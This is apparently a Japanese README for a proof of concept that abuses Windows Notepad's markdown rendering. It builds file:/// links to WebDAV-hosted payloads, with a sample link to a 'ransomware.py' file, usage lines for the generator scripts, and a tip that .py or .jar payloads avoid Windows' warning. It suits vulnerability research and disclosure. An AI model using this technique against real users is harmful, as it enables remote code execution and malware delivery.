"Windows Notepad RCE" 脆弱性の PoC。
この「脆弱性」は単純です。Windows メモ帳のマークダウンエンジンは、あまり知られていない URL プロトコルを気にしません。マルウェアアナリストとして、WebDAV ベースおよび SMB ベースのペイロード展開に関する多くのレポートを読んできました。このドキュメントから、file:/// プロトコルを悪用して、WebDAV/SMB サーバー上のファイルを指す URL を作成できます。
[BadLink](file:///\\webdav-payload-host@5005\DavWWWRoot\ransomware.py)
私は2つのスクリプトを作成しました。1つは Node.js、もう1つは Python です。どちらも WebDAV ペイロードを指すマークダウンファイルを作成します。sample-payloads フォルダー内のサンプルペイロードを使用できます。
node poc.js <webdav-server> <port> <payload/path/on/server>
python poc.py <webdav-server> <port> <payload/path/on/server>
出力(poc.md)は現在のディレクトリに生成されます。
メモ帳アプリが脆弱であるにもかかわらず、ほとんどのペイロードファイル拡張子(例:.exe、.lnk、.vbs、...)は組み込みの警告を引き起こします。警告は Windows 自体から発せられます。少なくとも、デフォルトの OOB インストールでコード実行につながると私がテストしたすべてのものは、この必須の警告を表示します。

ターゲットデバイスに Python または Java がインストールされている場合、.py または .jar ペイロードを使用して警告ポップアップを回避できます。

リンクをクリックすると、新しいポップアップ警告が表示されるようになりました。
脆弱なバージョンの Windows メモ帳は Uptodown から見つけることができます。インストーラーのデジタル署名を確認し、Microsoft 製であることを確認することを忘れないでください。また、この PoC は VM 内でのみテストする必要があります。
安全に気をつけて、楽しんでください!